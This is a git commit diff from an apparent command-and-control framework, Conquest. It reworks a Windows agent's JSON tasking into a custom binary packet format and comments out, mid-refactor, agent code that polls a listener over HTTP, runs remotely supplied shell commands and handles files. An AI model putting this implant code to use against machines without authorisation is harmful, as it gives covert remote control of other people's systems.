Started rewriting JSON task to custom binary structure. Parsed and serialized task object into seq[byte]

This commit is contained in:
Jakob Friedl
2025-07-18 14:24:07 +02:00
parent 310ad82cc5
commit 5825ec91a1
28 changed files with 926 additions and 732 deletions

View File

@@ -1,3 +1,3 @@
import ./[shell, sleep, filesystem] # import ./[shell, sleep, filesystem]
export shell, sleep, filesystem # export shell, sleep, filesystem

View File

@@ -1,332 +1,332 @@
import os, strutils, strformat, base64, winim, times, algorithm, json # import os, strutils, strformat, base64, winim, times, algorithm, json
import ../types # import ../common/types
# Retrieve current working directory # # Retrieve current working directory
proc taskPwd*(task: Task): TaskResult = # proc taskPwd*(task: Task): TaskResult =
echo fmt"Retrieving current working directory." # echo fmt"Retrieving current working directory."
try: # try:
# Get current working directory using GetCurrentDirectory # # Get current working directory using GetCurrentDirectory
let # let
buffer = newWString(MAX_PATH + 1) # buffer = newWString(MAX_PATH + 1)
length = GetCurrentDirectoryW(MAX_PATH, &buffer) # length = GetCurrentDirectoryW(MAX_PATH, &buffer)
if length == 0: # if length == 0:
raise newException(OSError, fmt"Failed to get working directory ({GetLastError()}).") # raise newException(OSError, fmt"Failed to get working directory ({GetLastError()}).")
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode($buffer[0 ..< (int)length] & "\n"), # data: encode($buffer[0 ..< (int)length] & "\n"),
status: Completed # status: Completed
) # )
except CatchableError as err: # except CatchableError as err:
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(fmt"An error occured: {err.msg}" & "\n"), # data: encode(fmt"An error occured: {err.msg}" & "\n"),
status: Failed # status: Failed
) # )
# Change working directory # # Change working directory
proc taskCd*(task: Task): TaskResult = # proc taskCd*(task: Task): TaskResult =
# Parse arguments # # Parse arguments
let targetDirectory = parseJson(task.args)["directory"].getStr() # let targetDirectory = parseJson(task.args)["directory"].getStr()
echo fmt"Changing current working directory to {targetDirectory}." # echo fmt"Changing current working directory to {targetDirectory}."
try: # try:
# Get current working directory using GetCurrentDirectory # # Get current working directory using GetCurrentDirectory
if SetCurrentDirectoryW(targetDirectory) == FALSE: # if SetCurrentDirectoryW(targetDirectory) == FALSE:
raise newException(OSError, fmt"Failed to change working directory ({GetLastError()}).") # raise newException(OSError, fmt"Failed to change working directory ({GetLastError()}).")
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(""), # data: encode(""),
status: Completed # status: Completed
) # )
except CatchableError as err: # except CatchableError as err:
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(fmt"An error occured: {err.msg}" & "\n"), # data: encode(fmt"An error occured: {err.msg}" & "\n"),
status: Failed # status: Failed
) # )
# List files and directories at a specific or at the current path # # List files and directories at a specific or at the current path
proc taskDir*(task: Task): TaskResult = # proc taskDir*(task: Task): TaskResult =
# Parse arguments # # Parse arguments
var targetDirectory = parseJson(task.args)["directory"].getStr() # var targetDirectory = parseJson(task.args)["directory"].getStr()
echo fmt"Listing files and directories." # echo fmt"Listing files and directories."
try: # try:
# Check if users wants to list files in the current working directory or at another path # # Check if users wants to list files in the current working directory or at another path
if targetDirectory == "": # if targetDirectory == "":
# Get current working directory using GetCurrentDirectory # # Get current working directory using GetCurrentDirectory
let # let
cwdBuffer = newWString(MAX_PATH + 1) # cwdBuffer = newWString(MAX_PATH + 1)
cwdLength = GetCurrentDirectoryW(MAX_PATH, &cwdBuffer) # cwdLength = GetCurrentDirectoryW(MAX_PATH, &cwdBuffer)
if cwdLength == 0: # if cwdLength == 0:
raise newException(OSError, fmt"Failed to get working directory ({GetLastError()}).") # raise newException(OSError, fmt"Failed to get working directory ({GetLastError()}).")
targetDirectory = $cwdBuffer[0 ..< (int)cwdLength] # targetDirectory = $cwdBuffer[0 ..< (int)cwdLength]
# Prepare search pattern (target directory + \*) # # Prepare search pattern (target directory + \*)
let searchPattern = targetDirectory & "\\*" # let searchPattern = targetDirectory & "\\*"
let searchPatternW = newWString(searchPattern) # let searchPatternW = newWString(searchPattern)
var # var
findData: WIN32_FIND_DATAW # findData: WIN32_FIND_DATAW
hFind: HANDLE # hFind: HANDLE
output = "" # output = ""
entries: seq[string] = @[] # entries: seq[string] = @[]
totalFiles = 0 # totalFiles = 0
totalDirs = 0 # totalDirs = 0
# Find files and directories in target directory # # Find files and directories in target directory
hFind = FindFirstFileW(searchPatternW, &findData) # hFind = FindFirstFileW(searchPatternW, &findData)
if hFind == INVALID_HANDLE_VALUE: # if hFind == INVALID_HANDLE_VALUE:
raise newException(OSError, fmt"Failed to find files ({GetLastError()}).") # raise newException(OSError, fmt"Failed to find files ({GetLastError()}).")
# Directory was found and can be listed # # Directory was found and can be listed
else: # else:
output = fmt"Directory: {targetDirectory}" & "\n\n" # output = fmt"Directory: {targetDirectory}" & "\n\n"
output &= "Mode LastWriteTime Length Name" & "\n" # output &= "Mode LastWriteTime Length Name" & "\n"
output &= "---- ------------- ------ ----" & "\n" # output &= "---- ------------- ------ ----" & "\n"
# Process all files and directories # # Process all files and directories
while true: # while true:
let fileName = $cast[WideCString](addr findData.cFileName[0]) # let fileName = $cast[WideCString](addr findData.cFileName[0])
# Skip current and parent directory entries # # Skip current and parent directory entries
if fileName != "." and fileName != "..": # if fileName != "." and fileName != "..":
# Get file attributes and size # # Get file attributes and size
let isDir = (findData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) != 0 # let isDir = (findData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) != 0
let isHidden = (findData.dwFileAttributes and FILE_ATTRIBUTE_HIDDEN) != 0 # let isHidden = (findData.dwFileAttributes and FILE_ATTRIBUTE_HIDDEN) != 0
let isReadOnly = (findData.dwFileAttributes and FILE_ATTRIBUTE_READONLY) != 0 # let isReadOnly = (findData.dwFileAttributes and FILE_ATTRIBUTE_READONLY) != 0
let isArchive = (findData.dwFileAttributes and FILE_ATTRIBUTE_ARCHIVE) != 0 # let isArchive = (findData.dwFileAttributes and FILE_ATTRIBUTE_ARCHIVE) != 0
let fileSize = (int64(findData.nFileSizeHigh) shl 32) or int64(findData.nFileSizeLow) # let fileSize = (int64(findData.nFileSizeHigh) shl 32) or int64(findData.nFileSizeLow)
# Handle flags # # Handle flags
var mode = "" # var mode = ""
if isDir: # if isDir:
mode = "d" # mode = "d"
inc totalDirs # inc totalDirs
else: # else:
mode = "-" # mode = "-"
inc totalFiles # inc totalFiles
if isArchive: # if isArchive:
mode &= "a" # mode &= "a"
else: # else:
mode &= "-" # mode &= "-"
if isReadOnly: # if isReadOnly:
mode &= "r" # mode &= "r"
else: # else:
mode &= "-" # mode &= "-"
if isHidden: # if isHidden:
mode &= "h" # mode &= "h"
else: # else:
mode &= "-" # mode &= "-"
if (findData.dwFileAttributes and FILE_ATTRIBUTE_SYSTEM) != 0: # if (findData.dwFileAttributes and FILE_ATTRIBUTE_SYSTEM) != 0:
mode &= "s" # mode &= "s"
else: # else:
mode &= "-" # mode &= "-"
# Convert FILETIME to local time and format # # Convert FILETIME to local time and format
var # var
localTime: FILETIME # localTime: FILETIME
systemTime: SYSTEMTIME # systemTime: SYSTEMTIME
dateTimeStr = "01/01/1970 00:00:00" # dateTimeStr = "01/01/1970 00:00:00"
if FileTimeToLocalFileTime(&findData.ftLastWriteTime, &localTime) != 0 and FileTimeToSystemTime(&localTime, &systemTime) != 0: # if FileTimeToLocalFileTime(&findData.ftLastWriteTime, &localTime) != 0 and FileTimeToSystemTime(&localTime, &systemTime) != 0:
# Format date and time in PowerShell style # # Format date and time in PowerShell style
dateTimeStr = fmt"{systemTime.wDay:02d}/{systemTime.wMonth:02d}/{systemTime.wYear} {systemTime.wHour:02d}:{systemTime.wMinute:02d}:{systemTime.wSecond:02d}" # dateTimeStr = fmt"{systemTime.wDay:02d}/{systemTime.wMonth:02d}/{systemTime.wYear} {systemTime.wHour:02d}:{systemTime.wMinute:02d}:{systemTime.wSecond:02d}"
# Format file size # # Format file size
var sizeStr = "" # var sizeStr = ""
if isDir: # if isDir:
sizeStr = "<DIR>" # sizeStr = "<DIR>"
else: # else:
sizeStr = ($fileSize).replace("-", "") # sizeStr = ($fileSize).replace("-", "")
# Build the entry line # # Build the entry line
let entryLine = fmt"{mode:<7} {dateTimeStr:<20} {sizeStr:>10} {fileName}" # let entryLine = fmt"{mode:<7} {dateTimeStr:<20} {sizeStr:>10} {fileName}"
entries.add(entryLine) # entries.add(entryLine)
# Find next file # # Find next file
if FindNextFileW(hFind, &findData) == 0: # if FindNextFileW(hFind, &findData) == 0:
break # break
# Close find handle # # Close find handle
discard FindClose(hFind) # discard FindClose(hFind)
# Add entries to output after sorting them (directories first, files afterwards) # # Add entries to output after sorting them (directories first, files afterwards)
entries.sort do (a, b: string) -> int: # entries.sort do (a, b: string) -> int:
let aIsDir = a[0] == 'd' # let aIsDir = a[0] == 'd'
let bIsDir = b[0] == 'd' # let bIsDir = b[0] == 'd'
if aIsDir and not bIsDir: # if aIsDir and not bIsDir:
return -1 # return -1
elif not aIsDir and bIsDir: # elif not aIsDir and bIsDir:
return 1 # return 1
else: # else:
# Extract filename for comparison (last part after the last space) # # Extract filename for comparison (last part after the last space)
let aParts = a.split(" ") # let aParts = a.split(" ")
let bParts = b.split(" ") # let bParts = b.split(" ")
let aName = aParts[^1] # let aName = aParts[^1]
let bName = bParts[^1] # let bName = bParts[^1]
return cmp(aName.toLowerAscii(), bName.toLowerAscii()) # return cmp(aName.toLowerAscii(), bName.toLowerAscii())
for entry in entries: # for entry in entries:
output &= entry & "\n" # output &= entry & "\n"
# Add summary of how many files/directories have been found # # Add summary of how many files/directories have been found
output &= "\n" & fmt"{totalFiles} file(s)" & "\n" # output &= "\n" & fmt"{totalFiles} file(s)" & "\n"
output &= fmt"{totalDirs} dir(s)" & "\n" # output &= fmt"{totalDirs} dir(s)" & "\n"
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(output), # data: encode(output),
status: Completed # status: Completed
) # )
except CatchableError as err: # except CatchableError as err:
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(fmt"An error occured: {err.msg}" & "\n"), # data: encode(fmt"An error occured: {err.msg}" & "\n"),
status: Failed # status: Failed
) # )
# Remove file # # Remove file
proc taskRm*(task: Task): TaskResult = # proc taskRm*(task: Task): TaskResult =
# Parse arguments # # Parse arguments
let target = parseJson(task.args)["file"].getStr() # let target = parseJson(task.args)["file"].getStr()
echo fmt"Deleting file {target}." # echo fmt"Deleting file {target}."
try: # try:
if DeleteFile(target) == FALSE: # if DeleteFile(target) == FALSE:
raise newException(OSError, fmt"Failed to delete file ({GetLastError()}).") # raise newException(OSError, fmt"Failed to delete file ({GetLastError()}).")
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(""), # data: encode(""),
status: Completed # status: Completed
) # )
except CatchableError as err: # except CatchableError as err:
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(fmt"An error occured: {err.msg}" & "\n"), # data: encode(fmt"An error occured: {err.msg}" & "\n"),
status: Failed # status: Failed
) # )
# Remove directory # # Remove directory
proc taskRmdir*(task: Task): TaskResult = # proc taskRmdir*(task: Task): TaskResult =
# Parse arguments # # Parse arguments
let target = parseJson(task.args)["directory"].getStr() # let target = parseJson(task.args)["directory"].getStr()
echo fmt"Deleting directory {target}." # echo fmt"Deleting directory {target}."
try: # try:
if RemoveDirectoryA(target) == FALSE: # if RemoveDirectoryA(target) == FALSE:
raise newException(OSError, fmt"Failed to delete directory ({GetLastError()}).") # raise newException(OSError, fmt"Failed to delete directory ({GetLastError()}).")
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(""), # data: encode(""),
status: Completed # status: Completed
) # )
except CatchableError as err: # except CatchableError as err:
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(fmt"An error occured: {err.msg}" & "\n"), # data: encode(fmt"An error occured: {err.msg}" & "\n"),
status: Failed # status: Failed
) # )
# Move file or directory # # Move file or directory
proc taskMove*(task: Task): TaskResult = # proc taskMove*(task: Task): TaskResult =
# Parse arguments # # Parse arguments
echo task.args # echo task.args
let # let
params = parseJson(task.args) # params = parseJson(task.args)
lpExistingFileName = params["from"].getStr() # lpExistingFileName = params["from"].getStr()
lpNewFileName = params["to"].getStr() # lpNewFileName = params["to"].getStr()
echo fmt"Moving {lpExistingFileName} to {lpNewFileName}." # echo fmt"Moving {lpExistingFileName} to {lpNewFileName}."
try: # try:
if MoveFile(lpExistingFileName, lpNewFileName) == FALSE: # if MoveFile(lpExistingFileName, lpNewFileName) == FALSE:
raise newException(OSError, fmt"Failed to move file or directory ({GetLastError()}).") # raise newException(OSError, fmt"Failed to move file or directory ({GetLastError()}).")
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(""), # data: encode(""),
status: Completed # status: Completed
) # )
except CatchableError as err: # except CatchableError as err:
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(fmt"An error occured: {err.msg}" & "\n"), # data: encode(fmt"An error occured: {err.msg}" & "\n"),
status: Failed # status: Failed
) # )
# Copy file or directory # # Copy file or directory
proc taskCopy*(task: Task): TaskResult = # proc taskCopy*(task: Task): TaskResult =
# Parse arguments # # Parse arguments
let # let
params = parseJson(task.args) # params = parseJson(task.args)
lpExistingFileName = params["from"].getStr() # lpExistingFileName = params["from"].getStr()
lpNewFileName = params["to"].getStr() # lpNewFileName = params["to"].getStr()
echo fmt"Copying {lpExistingFileName} to {lpNewFileName}." # echo fmt"Copying {lpExistingFileName} to {lpNewFileName}."
try: # try:
# Copy file to new location, overwrite if a file with the same name already exists # # Copy file to new location, overwrite if a file with the same name already exists
if CopyFile(lpExistingFileName, lpNewFileName, FALSE) == FALSE: # if CopyFile(lpExistingFileName, lpNewFileName, FALSE) == FALSE:
raise newException(OSError, fmt"Failed to copy file or directory ({GetLastError()}).") # raise newException(OSError, fmt"Failed to copy file or directory ({GetLastError()}).")
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(""), # data: encode(""),
status: Completed # status: Completed
) # )
except CatchableError as err: # except CatchableError as err:
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(fmt"An error occured: {err.msg}" & "\n"), # data: encode(fmt"An error occured: {err.msg}" & "\n"),
status: Failed # status: Failed
) # )

View File

@@ -1,30 +1,30 @@
import winim, osproc, strutils, strformat, base64, json import winim, osproc, strutils, strformat, base64, json
import ../types import ../common/types
proc taskShell*(task: Task): TaskResult = proc taskShell*(task: Task): TaskResult =
# Parse arguments JSON string to obtain specific values # # Parse arguments JSON string to obtain specific values
let # let
params = parseJson(task.args) # params = parseJson(task.args)
command = params["command"].getStr() # command = params["command"].getStr()
arguments = params["arguments"].getStr() # arguments = params["arguments"].getStr()
echo fmt"Executing command {command} with arguments {arguments}" # echo fmt"Executing command {command} with arguments {arguments}"
try: # try:
let (output, status) = execCmdEx(fmt("{command} {arguments}")) # let (output, status) = execCmdEx(fmt("{command} {arguments}"))
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(output), # data: encode(output),
status: Completed # status: Completed
) # )
except CatchableError as err: # except CatchableError as err:
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(fmt"An error occured: {err.msg}" & "\n"), # data: encode(fmt"An error occured: {err.msg}" & "\n"),
status: Failed # status: Failed
) # )

View File

@@ -1,27 +1,27 @@
import os, strutils, strformat, base64, json # import os, strutils, strformat, base64, json
import ../types # import ../common/types
proc taskSleep*(task: Task): TaskResult = # proc taskSleep*(task: Task): TaskResult =
# Parse task parameter # # Parse task parameter
let delay = parseJson(task.args)["delay"].getInt() # let delay = parseJson(task.args)["delay"].getInt()
echo fmt"Sleeping for {delay} seconds." # echo fmt"Sleeping for {delay} seconds."
try: # try:
sleep(delay * 1000) # sleep(delay * 1000)
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(""), # data: encode(""),
status: Completed # status: Completed
) # )
except CatchableError as err: # except CatchableError as err:
return TaskResult( # return TaskResult(
task: task.id, # task: task.id,
agent: task.agent, # agent: task.agent,
data: encode(fmt"An error occured: {err.msg}" & "\n"), # data: encode(fmt"An error occured: {err.msg}" & "\n"),
status: Failed # status: Failed
) # )

View File

@@ -34,41 +34,41 @@ proc register*(config: AgentConfig): string =
proc getTasks*(config: AgentConfig, agent: string): seq[Task] = proc getTasks*(config: AgentConfig, agent: string): seq[Task] =
let client = newAsyncHttpClient() # let client = newAsyncHttpClient()
var responseBody = "" # var responseBody = ""
try: # try:
# Register agent to the Conquest server # # Register agent to the Conquest server
responseBody = waitFor client.getContent(fmt"http://{config.ip}:{$config.port}/{config.listener}/{agent}/tasks") # responseBody = waitFor client.getContent(fmt"http://{config.ip}:{$config.port}/{config.listener}/{agent}/tasks")
return parseJson(responseBody).to(seq[Task]) # return parseJson(responseBody).to(seq[Task])
except CatchableError as err: # except CatchableError as err:
# When the listener is not reachable, don't kill the application, but check in at the next time # # When the listener is not reachable, don't kill the application, but check in at the next time
echo "[-] [getTasks]: ", responseBody # echo "[-] [getTasks]: ", responseBody
finally: # finally:
client.close() # client.close()
return @[] return @[]
proc postResults*(config: AgentConfig, agent: string, taskResult: TaskResult): bool = proc postResults*(config: AgentConfig, agent: string, taskResult: TaskResult): bool =
let client = newAsyncHttpClient() # let client = newAsyncHttpClient()
# Define headers # # Define headers
client.headers = newHttpHeaders({ "Content-Type": "application/json" }) # client.headers = newHttpHeaders({ "Content-Type": "application/json" })
let taskJson = %taskResult # let taskJson = %taskResult
echo $taskJson # echo $taskJson
try: # try:
# Register agent to the Conquest server # # Register agent to the Conquest server
discard waitFor client.postContent(fmt"http://{config.ip}:{$config.port}/{config.listener}/{agent}/{taskResult.task}/results", $taskJson) # discard waitFor client.postContent(fmt"http://{config.ip}:{$config.port}/{config.listener}/{agent}/{taskResult.task}/results", $taskJson)
except CatchableError as err: # except CatchableError as err:
# When the listener is not reachable, don't kill the application, but check in at the next time # # When the listener is not reachable, don't kill the application, but check in at the next time
echo "[-] [postResults]: ", err.msg # echo "[-] [postResults]: ", err.msg
return false # return false
finally: # finally:
client.close() # client.close()
return true return true

View File

@@ -5,4 +5,4 @@
-d:Octet3="0" -d:Octet3="0"
-d:Octet4="1" -d:Octet4="1"
-d:ListenerPort=9999 -d:ListenerPort=9999
-d:SleepDelay=10 -d:SleepDelay=1

View File

@@ -1,34 +1,35 @@
import strutils, tables, json import strutils, tables, json
import ./types import ./common/types
import ./commands/commands import ./commands/commands
proc handleTask*(task: Task, config: AgentConfig): TaskResult = proc handleTask*(task: Task, config: AgentConfig): TaskResult =
var taskResult: TaskResult var taskResult: TaskResult
let handlers = { # let handlers = {
ExecuteShell: taskShell, # CMD_SLEEP: taskSleep,
Sleep: taskSleep, # CMD_SHELL: taskShell,
GetWorkingDirectory: taskPwd, # CMD_PWD: taskPwd,
SetWorkingDirectory: taskCd, # CMD_CD: taskCd,
ListDirectory: taskDir, # CMD_LS: taskDir,
RemoveFile: taskRm, # CMD_RM: taskRm,
RemoveDirectory: taskRmdir, # CMD_RMDIR: taskRmdir,
Move: taskMove, # CMD_MOVE: taskMove,
Copy: taskCopy # CMD_COPY: taskCopy
}.toTable # }.toTable
# Handle task command # Handle task command
taskResult = handlers[task.command](task) # taskResult = handlers[task.command](task)
echo taskResult.data # echo taskResult.data
# Handle actions on specific commands # Handle actions on specific commands
case task.command: # case task.command:
of Sleep: # of CMD_SLEEP:
if taskResult.status == Completed: # if taskResult.status == STATUS_COMPLETED:
config.sleep = parseJson(task.args)["delay"].getInt() # # config.sleep = parseJson(task.args)["delay"].getInt()
else: # discard
discard # else:
# discard
# Return the result # # Return the result
return taskResult # return taskResult

View File

@@ -1,6 +1,6 @@
import winim import winim
import ../../types import ../../common/types
export Task, CommandType, TaskResult, TaskStatus export Task, CommandType, TaskResult, StatusType
type type
ProductType* = enum ProductType* = enum

View File

@@ -1,5 +1,5 @@
import strformat import strformat
import ./types import ./common/types
proc getWindowsVersion*(info: OSVersionInfoExW, productType: ProductType): string = proc getWindowsVersion*(info: OSVersionInfoExW, productType: ProductType): string =
let let

0
src/common/crypto.nim Normal file
View File

66
src/common/serialize.nim Normal file
View File

@@ -0,0 +1,66 @@
import streams, strutils
import ./types
type
Packer* = ref object
headerStream: StringStream
payloadStream: StringStream
proc initTaskPacker*(): Packer =
result = new Packer
result.headerStream = newStringStream()
result.payloadStream = newStringStream()
proc addToHeader*[T: uint8 | uint16 | uint32 | uint64](packer: Packer, value: T): Packer {.discardable.} =
packer.headerStream.write(value)
return packer
proc addToPayload*[T: uint8 | uint16 | uint32 | uint64](packer: Packer, value: T): Packer {.discardable.} =
packer.payloadStream.write(value)
return packer
proc addDataToHeader*(packer: Packer, data: openArray[byte]): Packer {.discardable.} =
packer.headerStream.writeData(data[0].unsafeAddr, data.len)
return packer
proc addDataToPayload*(packer: Packer, data: openArray[byte]): Packer {.discardable.} =
packer.payloadStream.writeData(data[0].unsafeAddr, data.len)
return packer
proc addArgument*(packer: Packer, arg: TaskArg): Packer {.discardable.} =
if arg.data.len <= 0:
# Optional argument was passed as "", ignore
return
packer.addToPayload(arg.argType)
case arg.argType:
of cast[uint8](STRING), cast[uint8](BINARY):
# Add length for variable-length data types
packer.addToPayload(cast[uint32](arg.data.len))
packer.addDataToPayload(arg.data)
else:
packer.addDataToPayload(arg.data)
return packer
proc packPayload*(packer: Packer): seq[byte] =
packer.payloadStream.setPosition(0)
let data = packer.payloadStream.readAll()
result = newSeq[byte](data.len)
for i, c in data:
result[i] = byte(c.ord)
packer.payloadStream.setPosition(0)
proc packHeader*(packer: Packer): seq[byte] =
packer.headerStream.setPosition(0)
let data = packer.headerStream.readAll()
# Convert string to seq[byte]
result = newSeq[byte](data.len)
for i, c in data:
result[i] = byte(c.ord)
packer.headerStream.setPosition(0)

149
src/common/types.nim Normal file
View File

@@ -0,0 +1,149 @@
import prompt
import tables
import times
import streams
# Custom Binary Task structure
const
MAGIC* = 0x514E3043'u32 # Magic value: C0NQ
VERSION* = 1'u8 # Version 1l
HEADER_SIZE* = 32'u8 # 32 bytes fixed packet header size
type
PacketType* = enum
MSG_TASK = 0'u8
MSG_RESPONSE = 1'u8
MSG_REGISTER = 100'u8
ArgType* = enum
STRING = 0'u8
INT = 1'u8
LONG = 2'u8
BOOL = 3'u8
BINARY = 4'u8
HeaderFlags* = enum
# Flags should be powers of 2 so they can be connected with or operators
FLAG_PLAINTEXT = 0'u16
FLAG_ENCRYPTED = 1'u16
CommandType* = enum
CMD_SLEEP = 0'u16
CMD_SHELL = 1'u16
CMD_PWD = 2'u16
CMD_CD = 3'u16
CMD_LS = 4'u16
CMD_RM = 5'u16
CMD_RMDIR = 6'u16
CMD_MOVE = 7'u16
CMD_COPY = 8'u16
StatusType* = enum
STATUS_COMPLETED = 0'u8
STATUS_FAILED = 1'u8
ResultType* = enum
RESULT_STRING = 0'u8
RESULT_BINARY = 1'u8
Header* = object
magic*: uint32 # [4 bytes ] magic value
version*: uint8 # [1 byte ] protocol version
packetType*: uint8 # [1 byte ] message type
flags*: uint16 # [2 bytes ] message flags
seqNr*: uint32 # [4 bytes ] sequence number / nonce
size*: uint32 # [4 bytes ] size of the payload body
hmac*: array[16, byte] # [16 bytes] hmac for message integrity
TaskArg* = object
argType*: uint8 # [1 byte ] argument type
data*: seq[byte] # variable length data (for variable data types (STRING, BINARY), the first 4 bytes indicate data length)
Task* = object
header*: Header
taskId*: uint32 # [4 bytes ] task id
agentId*: uint32 # [4 bytes ] agent id
listenerId*: uint32 # [4 bytes ] listener id
timestamp*: uint32 # [4 bytes ] unix timestamp
command*: uint16 # [2 bytes ] command id
argCount*: uint8 # [1 byte ] number of arguments
args*: seq[TaskArg] # variable length arguments
TaskResult* = object
header*: Header
taskId*: uint32 # [4 bytes ] task id
agentId*: uint32 # [4 bytes ] agent id
listenerId*: uint32 # [4 bytes ] listener id
timestamp*: uint32 # [4 bytes ] unix timestamp
command*: uint16 # [2 bytes ] command id
status*: uint8 # [1 byte ] success flag
resultType*: uint8 # [1 byte ] result data type (string, binary)
length*: uint32 # [4 bytes ] result length
data*: seq[byte] # variable length result
# Commands
Argument* = object
name*: string
description*: string
argumentType*: ArgType
isRequired*: bool
Command* = object
name*: string
commandType*: CommandType
description*: string
example*: string
arguments*: seq[Argument]
dispatchMessage*: string
# Agent structure
type
AgentRegistrationData* = object
username*: string
hostname*: string
domain*: string
ip*: string
os*: string
process*: string
pid*: int
elevated*: bool
sleep*: int
Agent* = ref object
name*: string
listener*: string
username*: string
hostname*: string
domain*: string
process*: string
pid*: int
ip*: string
os*: string
elevated*: bool
sleep*: int
jitter*: float
tasks*: seq[seq[byte]]
firstCheckin*: DateTime
latestCheckin*: DateTime
# Listener structure
type
Protocol* = enum
HTTP = "http"
Listener* = ref object
name*: string
address*: string
port*: int
protocol*: Protocol
# Server structure
type
Conquest* = ref object
prompt*: Prompt
dbPath*: string
listeners*: Table[string, Listener]
agents*: Table[string, Agent]
interactAgent*: Agent

View File

@@ -2,7 +2,7 @@ import terminal, strformat, strutils, sequtils, tables, json, times, base64, sys
import ../[utils, globals] import ../[utils, globals]
import ../db/database import ../db/database
import ../../types import ../../common/types
# Utility functions # Utility functions
proc add*(cq: Conquest, agent: Agent) = proc add*(cq: Conquest, agent: Agent) =
@@ -36,27 +36,27 @@ proc register*(agent: Agent): bool =
return true return true
proc getTasks*(listener, agent: string): JsonNode = proc getTasks*(listener, agent: string): seq[seq[byte]] =
{.cast(gcsafe).}: {.cast(gcsafe).}:
# Check if listener exists # Check if listener exists
if not cq.dbListenerExists(listener.toUpperAscii): if not cq.dbListenerExists(listener.toUpperAscii):
cq.writeLine(fgRed, styleBright, fmt"[-] Task-retrieval request made to non-existent listener: {listener}.", "\n") cq.writeLine(fgRed, styleBright, fmt"[-] Task-retrieval request made to non-existent listener: {listener}.", "\n")
return nil raise newException(ValueError, "Invalid listener.")
# Check if agent exists # Check if agent exists
if not cq.dbAgentExists(agent.toUpperAscii): if not cq.dbAgentExists(agent.toUpperAscii):
cq.writeLine(fgRed, styleBright, fmt"[-] Task-retrieval request made to non-existent agent: {agent}.", "\n") cq.writeLine(fgRed, styleBright, fmt"[-] Task-retrieval request made to non-existent agent: {agent}.", "\n")
return nil raise newException(ValueError, "Invalid agent.")
# Update the last check-in date for the accessed agent # Update the last check-in date for the accessed agent
cq.agents[agent.toUpperAscii].latestCheckin = now() cq.agents[agent.toUpperAscii].latestCheckin = now()
# if not cq.dbUpdateCheckin(agent.toUpperAscii, now().format("dd-MM-yyyy HH:mm:ss")): # if not cq.dbUpdateCheckin(agent.toUpperAscii, now().format("dd-MM-yyyy HH:mm:ss")):
# return nil # return nil
# Return tasks in JSON format # Return tasks
return %cq.agents[agent.toUpperAscii].tasks return cq.agents[agent.toUpperAscii].tasks
proc handleResult*(listener, agent, task: string, taskResult: TaskResult) = proc handleResult*(listener, agent, task: string, taskResult: TaskResult) =
@@ -64,31 +64,31 @@ proc handleResult*(listener, agent, task: string, taskResult: TaskResult) =
let date: string = now().format("dd-MM-yyyy HH:mm:ss") let date: string = now().format("dd-MM-yyyy HH:mm:ss")
if taskResult.status == Failed: if taskResult.status == cast[uint8](STATUS_FAILED):
cq.writeLine(fgBlack, styleBright, fmt"[{date}]", fgRed, styleBright, " [-] ", resetStyle, fmt"Task {task} failed.") cq.writeLine(fgBlack, styleBright, fmt"[{date}]", fgRed, styleBright, " [-] ", resetStyle, fmt"Task {task} failed.")
if taskResult.data != "": if taskResult.data.len != 0:
cq.writeLine(fgBlack, styleBright, fmt"[{date}]", fgRed, styleBright, " [-] ", resetStyle, "Output:") cq.writeLine(fgBlack, styleBright, fmt"[{date}]", fgRed, styleBright, " [-] ", resetStyle, "Output:")
# Split result string on newline to keep formatting # Split result string on newline to keep formatting
for line in decode(taskResult.data).split("\n"): # for line in decode(taskResult.data).split("\n"):
cq.writeLine(line) # cq.writeLine(line)
else: else:
cq.writeLine() cq.writeLine()
else: else:
cq.writeLine(fgBlack, styleBright, fmt"[{date}]", fgGreen, " [+] ", resetStyle, fmt"Task {task} finished.") cq.writeLine(fgBlack, styleBright, fmt"[{date}]", fgGreen, " [+] ", resetStyle, fmt"Task {task} finished.")
if taskResult.data != "": if taskResult.data.len != 0:
cq.writeLine(fgBlack, styleBright, fmt"[{date}]", fgGreen, " [+] ", resetStyle, "Output:") cq.writeLine(fgBlack, styleBright, fmt"[{date}]", fgGreen, " [+] ", resetStyle, "Output:")
# Split result string on newline to keep formatting # Split result string on newline to keep formatting
for line in decode(taskResult.data).split("\n"): # for line in decode(taskResult.data).split("\n"):
cq.writeLine(line) # cq.writeLine(line)
else: else:
cq.writeLine() cq.writeLine()
# Update task queue to include all tasks, except the one that was just completed # Update task queue to include all tasks, except the one that was just completed
cq.agents[agent].tasks = cq.agents[agent].tasks.filterIt(it.id != task) # cq.agents[agent].tasks = cq.agents[agent].tasks.filterIt(it.id != task)
return return

View File

@@ -3,7 +3,7 @@ import sequtils, strutils, times
import ./handlers import ./handlers
import ../utils import ../utils
import ../../types import ../../common/types
